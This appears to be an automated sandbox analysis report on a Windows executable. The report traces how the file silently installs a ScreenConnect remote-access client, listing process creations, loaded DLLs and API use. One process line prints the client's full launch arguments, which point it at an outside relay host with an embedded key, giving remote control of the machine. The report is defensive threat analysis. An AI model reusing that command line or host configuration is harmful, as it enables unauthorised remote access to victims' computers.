Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000001036000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSfxCA.dllL vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000001036000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewixca.dll\ vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000001036000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000001036000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000002.1410802943.0000000003650000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000002.1410640850.00000000035C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe, 00000000.00000002.1409997648.0000000001C00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe	Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe	Binary or memory string: OriginalFilenamelibwebp.dllB vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe	Binary or memory string: OriginalFilenamezlib.dll2 vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe	Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe	Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe	Binary or memory string: OriginalFilenameSfxCA.dllL vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe	Binary or memory string: OriginalFilenamewixca.dll\ vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe	Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs tmpzNIZ0YQ.exe
Source: tmpzNIZ0YQ.exe	Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs tmpzNIZ0YQ.exe

Uses 32bit PE files

Source: tmpzNIZ0YQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.0.tmpzNIZ0YQ.exe.c363d4.2.raw.unpack, CursorBuffer.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsToolkit.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.tmpzNIZ0YQ.exe.cbb9d4.4.raw.unpack, WindowsToolkit.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.tmpzNIZ0YQ.exe.35c0000.1.raw.unpack, CursorBuffer.cs	Cryptographic APIs: 'TransformBlock'

Source: 0.0.tmpzNIZ0YQ.exe.cbb9d4.4.raw.unpack, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.0.tmpzNIZ0YQ.exe.cbb9d4.4.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.0.tmpzNIZ0YQ.exe.cbb9d4.4.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.tmpzNIZ0YQ.exe.5bf0000.5.raw.unpack, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal50.troj.evad.winEXE@17/65@1/1

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tmpzNIZ0YQ.exe.log

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

File created: C:\Users\user\AppData\Local\Temp\ScreenConnect

Source: tmpzNIZ0YQ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: tmpzNIZ0YQ.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4293031 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

Source: tmpzNIZ0YQ.exe

ReversingLabs: Detection: 21%

Source: tmpzNIZ0YQ.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: tmpzNIZ0YQ.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

File read: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

Source: unknown	Process created: C:\Users\user\Desktop\tmpzNIZ0YQ.exe "C:\Users\user\Desktop\tmpzNIZ0YQ.exe"
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A147D8F4A2A0D4F5C5A36F7D0C7BF249 C
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4293031 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 52881A0F31505AA001D51A2B2FDDE9ED
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4081353BA27C3192F1069208B3FE053F E Global\MSI0000
Source: unknown	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lokistorage.xyz&p=8041&s=f323c95d-8cdd-41df-ba61-316036d00b41&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&t=Slawomirkowalski&c=PL&c=KUC&c=&c=&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "6499763b-8fe0-474c-8e02-22f9c957ab00" "User"
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "f01c433b-e368-416e-a09f-c16bb2e654cf" "System"
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\20ae101cef0f1acf\setup.msi"	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A147D8F4A2A0D4F5C5A36F7D0C7BF249 C	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 52881A0F31505AA001D51A2B2FDDE9ED	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4081353BA27C3192F1069208B3FE053F E Global\MSI0000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4293031 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "6499763b-8fe0-474c-8e02-22f9c957ab00" "User"	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Process created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe" "RunRole" "f01c433b-e368-416e-a09f-c16bb2e654cf" "System"	Jump to behavior

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll	Jump to behavior
